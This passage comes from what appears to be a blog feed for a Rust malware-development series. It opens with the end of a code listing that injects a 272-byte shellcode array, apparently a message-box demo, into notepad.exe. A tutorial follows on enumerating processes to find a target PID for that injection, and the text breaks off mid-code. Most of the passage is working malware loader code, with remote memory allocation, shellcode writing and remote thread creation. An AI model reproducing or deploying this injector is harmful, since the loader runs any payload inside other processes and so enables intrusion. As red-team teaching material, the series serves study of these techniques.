class="nf">.as_bool</span><span class="p">()</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"CloseHandle Error"</span><span class="p">)));</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">payload</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">272</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x9b</span><span class="p">,</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x71</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x46</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x36</span><span class="p">,</span> <span class="mi">0x38</span><span class="p">,</span> <span class="mi">0x4f</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xf3</span><span class="p">,</span> <span class="mi">0x59</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xd1</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x60</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x3c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x54</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x78</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xea</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x4a</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xee</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0xfc</span><span class="p">,</span> <span class="mi">0xac</span><span class="p">,</span> <span class="mi">0x84</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x07</span><span class="p">,</span> <span class="mi">0xc1</span><span class="p">,</span> <span class="mi">0xcf</span><span class="p">,</span> <span class="mi">0x0d</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xc7</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x3b</span><span class="p">,</span> <span class="mi">0x7c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x66</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x4b</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x44</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0xc3</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x29</span><span class="p">,</span> <span class="mi">0xd4</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe5</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0x4e</span><span class="p">,</span> <span class="mi">0x0e</span><span class="p">,</span> <span class="mi">0xec</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x9f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0xd8</span><span class="p">,</span> <span class="mi">0xe2</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x41</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x33</span><span class="p">,</span> <span class="mi">0x32</span><span class="p">,</span> <span class="mi">0x2e</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x0a</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe6</span><span class="p">,</span> <span class="mi">0x56</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0xa8</span><span class="p">,</span> <span class="mi">0xa2</span><span class="p">,</span> <span class="mi">0x4d</span><span class="p">,</span> <span class="mi">0xbc</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x5f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x69</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x6a</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x4c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x11</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x53</span><span class="p">,</span> <span class="mi">0x51</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xd0</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="p">];</span> <span class="k">let</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">;</span> <span class="k">let</span> <span class="n">payload_len</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.len</span><span class="p">();</span> <span class="k">match</span> <span class="nf">find_pid</span><span class="p">(</span><span class="s">"notepad.exe"</span><span class="p">)</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">pid</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="k">match</span> <span class="n">pid</span> <span class="p">{</span> <span class="mi">1</span><span class="o">..=</span><span class="nn">u32</span><span class="p">::</span><span class="n">MAX</span> <span class="k">=&gt;</span> <span class="k">match</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">)</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="k">=&gt;</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Process Injection Completed"</span><span class="p">),</span> <span class="nf">Err</span><span class="p">(</span><span class="n">e</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"{e}"</span><span class="p">),</span> <span class="p">},</span> <span class="mi">0</span> <span class="k">=&gt;</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Process not found"</span><span class="p">),</span> <span class="p">},</span> <span class="nf">Err</span><span class="p">(</span><span class="n">e</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Error: {e}"</span><span class="p">),</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> Mon, 20 Nov 2023 00:00:00 +0100 https://syrion.me/rustware-part-3-dynamic-api-resolution/ https://syrion.me/rustware-part-3-dynamic-api-resolution/ Malware Rustware Windows Rustware Part 2: Process Enumeration Development (Windows) <p>In the <a href="https://syrion.me/malware/rustware-part-1-shellcode-process-injection-development/">previous blog post</a> we have seen how to develop a Shellcode Process Injection in Rust; the described Process Injection flow relies on several WinAPIs: <strong>OpenProcess</strong> used to open a handle to the target process, then <strong>VirtualAllocEx</strong> was used to allocate a new readable and writable region of memory into the target process, <strong>WriteProcessMemory</strong> wrote the shellcode into the new allocated memory, then <strong>VirtualProtectEx</strong> was used to change the new allocated memory protection to readable and executable in order to allow the <strong>CreateRemoteThread</strong> to execute the shellcode contained into the new allocated memory in the target process.</p> <p>Generally, a malware targets one or more processes, it iterates over the existing system processes in order to find the target process, get its PID and inject the payload in it.</p> <p>This blog post describes how to iterate over processes and find a specified process PID in Rust; to do that, we use the <strong>CreateToolhelp32Snapshot</strong> to create a snapshot of all the running processes in the system, then using <strong>Process32First</strong> and <strong>Process32Next</strong> we can iterate all the snapshot processes to find the target process and get its PID, after that we use the <strong>inject</strong> function to perform the shellcode process injection as saw in the previous blog post.</p> <h2 id="process-enumeration">Process Enumeration</h2> <p>The process enumeration we are going to develop is very simple, it uses the following WinAPIs:</p> <ul> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot">CreateToolhelp32Snapshot</a></strong>: gets a handle to a snapshot, it includes all the running processes in the system</li> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-process32first">Process32First</a></strong>: gets information about the first process in the snapshot</li> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-process32next">Process32Next</a></strong>: gets information about the next process in the snapshot</li> </ul> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img1.png" alt="Screenshot" /> <em><center>Figure 1 - Process Enumeration</center></em></p> <p>The running process information from the snapshot is stored in the <strong><a href="https://learn.microsoft.com/it-it/windows/win32/api/tlhelp32/ns-tlhelp32-processentry32">PROCESSENTRY32</a></strong> struct.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">struct</span> <span class="n">PROCESSENTRY32</span> <span class="p">{</span> <span class="k">pub</span> <span class="n">dwSize</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">cntUsage</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">th32ProcessID</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">th32DefaultHeapID</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="k">pub</span> <span class="n">th32ModuleID</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">cntThreads</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">th32ParentProcessID</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">pcPriClassBase</span><span class="p">:</span> <span class="nb">i32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">dwFlags</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="k">pub</span> <span class="n">szExeFile</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">260</span><span class="p">],</span> <span class="p">}</span> </code></pre></div></div> <p>We are interested in the process name contained in the <strong>szExeFile</strong> field and in the process PID containted in the <strong>th32ProcessID</strong> field.</p> <h2 id="rustware-setup">Rustware Setup</h2> <p>Everything we need to develop a Rust program that leverages on WinAPI, is well described in the Microsoft “<a href="https://learn.microsoft.com/en-us/windows/dev-environment/rust/">Developing with Rust on Windows</a>”. In our case, we used the following software, plugins and crate:</p> <ul> <li>Visual Studio Code 1.83.0</li> <li>Rust-analyzer 0.3.1689</li> <li>CodeLLDB 1.10.0</li> <li>Crates 0.6.3</li> <li>Windows Crate 0.51.1</li> </ul> <h2 id="rustware-development">Rustware Development</h2> <p>First of all, it is necessary to add the Windows Crate and the features required by each WinAPI to the <strong>Cargo.toml</strong> file; we can see the features in the <a href="https://microsoft.github.io/windows-docs-rs/doc/windows/Win32/System/Memory/fn.VirtualAllocEx.html">Windows Crate documentation</a>.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img2.png" alt="Screenshot" /> <em><center>Figure 2 - CreateToolhelp32Snapshot Specification</center></em></p> <p>Below, a list of the WinAPIs we are going to use and the features they require:</p> <ul> <li><strong>CreateToolhelp32Snapshot</strong>:” Win32_System_Diagnostics_ToolHelp” and “Win32_Foundation”</li> <li><strong>Process32First</strong>: ”Win32_System_Diagnostics_ToolHelp” and “Win32_Foundation”</li> <li><strong>Process32Next</strong>: ”Win32_System_Diagnostics_ToolHelp” and “Win32_Foundation”</li> </ul> <p>After adding the Windows Crate and all the WinAPIs features, the Cargo.toml file will look like this.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img3.png" alt="Screenshot" /> <em><center>Figure 3 - Cargo.toml File</center></em></p> <p>Each feature must also be imported in the code; we can achieve this with the <strong>use</strong> declaration as shown in the image below.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::{</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::</span><span class="n">size_of</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::</span><span class="n">transmute</span><span class="p">};</span> <span class="k">use</span> <span class="nn">windows</span><span class="p">::{</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">Foundation</span><span class="p">::</span><span class="n">CloseHandle</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">Debug</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">ToolHelp</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Memory</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Threading</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="p">};</span> </code></pre></div></div> <p>The <strong>find_pid</strong> function takes the target process name as parameter and returns its PID.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">find_pid</span><span class="p">(</span><span class="n">target_process_name</span><span class="p">:</span><span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u32</span> </code></pre></div></div> <p>We have to declare: a variable <strong>pe32</strong> as a <strong>PROCESSENTRY32</strong> struct, initialize it with the default constructor, a string <strong>cur_process_name</strong> for the process name and a <strong>Result</strong> variable <strong>result_process32</strong> for the <strong>Process32First</strong> and <strong>Process32Next</strong> return value; then we must set the <strong>dwSize</strong> by getting the size of the <strong>PROCESSENTRY32</strong> struct.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">find_pid</span><span class="p">(</span><span class="n">target_process_name</span><span class="p">:</span><span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u32</span><span class="p">{</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">pe32</span><span class="p">:</span> <span class="n">PROCESSENTRY32</span> <span class="o">=</span> <span class="n">PROCESSENTRY32</span><span class="p">{</span><span class="o">..</span><span class="nn">Default</span><span class="p">::</span><span class="nf">default</span><span class="p">()};</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">cur_process_name</span><span class="p">;</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">result_process32</span><span class="p">;</span> <span class="n">pe32</span><span class="py">.dwSize</span> <span class="o">=</span> <span class="nn">size_of</span><span class="p">::</span><span class="o">&lt;</span><span class="n">PROCESSENTRY32</span><span class="o">&gt;</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>As seen in the previous blog post, the WinAPIs we are going to use are defined as <strong>unsafe</strong> function, so we need to add an <strong>unsafe</strong> block to use them.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img4.png" alt="Screenshot" /> <em><center>Figure 4 - CreateToolhelp32Snapshot Implementation</center></em></p> <p>The <strong>CreateToolhelp32Snapshot</strong> in the code below returns an error, or a handle to a snapshot; <strong>TH32CS_SNAPPROCESS</strong> means that all the running system processes must be included in the snapshot.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">unsafe</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_createtoolhelp32snapshot</span> <span class="o">=</span> <span class="nf">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span> <span class="k">match</span> <span class="n">result_createtoolhelp32snapshot</span><span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"CreateToolhelp32Snapshot succeeds"</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"CreateToolhelp32Snapshot Error: {}"</span><span class="p">,</span><span class="n">error</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>After that we can iterate all the processes in the snapshot by using <strong>Process32First</strong> and <strong>Process32Next</strong>; these two WinAPIs save the process details in the <strong>PROCESSENTRY32</strong> struct contained in the <strong>pe32</strong> variable. In each iteration we get the process name from the <strong>szExeFile</strong> field, convert it to utf8 string, and remove all the 0x0 bytes; then we compare the target process name with the current process name, if they match, we return it’s PID from the <strong>th32ProcessID</strong> field, otherwise we clear the <strong>szExeFile</strong> field and repeat the loop again. The function returns 0 if the target process is not found or if an error is generated.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">result_process32</span> <span class="o">=</span> <span class="nf">Process32First</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">);</span> <span class="k">loop</span><span class="p">{</span> <span class="k">match</span> <span class="n">result_process32</span><span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">_</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="n">cur_process_name</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">str</span><span class="p">::</span><span class="nf">from_utf8</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pe32</span><span class="py">.szExeFile</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">()</span><span class="nf">.trim_matches</span><span class="p">(</span><span class="nn">char</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span> <span class="k">if</span> <span class="n">cur_process_name</span><span class="nf">.to_lowercase</span><span class="p">()</span> <span class="o">==</span> <span class="n">target_process_name</span><span class="nf">.to_lowercase</span><span class="p">()</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Find {} PID: {}"</span><span class="p">,</span><span class="n">target_process_name</span><span class="p">,</span><span class="n">pe32</span><span class="py">.th32ProcessID</span><span class="p">);</span> <span class="k">let</span> <span class="n">_</span><span class="o">=</span> <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">);</span> <span class="k">return</span> <span class="n">pe32</span><span class="py">.th32ProcessID</span><span class="p">;</span> <span class="p">}</span> <span class="n">pe32</span><span class="py">.szExeFile</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">;</span><span class="mi">260</span><span class="p">];</span> <span class="n">result_process32</span> <span class="o">=</span> <span class="nf">Process32Next</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Process32 Error: {}"</span><span class="p">,</span><span class="n">error</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>In order to use the <strong>find_pid</strong> function, we can change the main function from the previous blog post as shown below.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">payload</span> <span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">272</span><span class="p">]</span><span class="o">=</span> <span class="p">[</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="o">...</span> <span class="p">,</span><span class="mi">0x08</span> <span class="p">];</span> <span class="k">let</span> <span class="n">payload_len</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.len</span><span class="p">();</span> <span class="k">let</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">;</span> <span class="k">let</span> <span class="n">target_process</span> <span class="o">=</span> <span class="s">"notepad.exe"</span><span class="p">;</span> <span class="k">let</span> <span class="n">pid</span> <span class="o">=</span> <span class="nf">find_pid</span><span class="p">(</span><span class="n">target_process</span><span class="p">);</span> <span class="k">if</span> <span class="n">pid</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span><span class="n">payload_ptr</span><span class="p">,</span><span class="n">payload_len</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span><span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"{} not found"</span><span 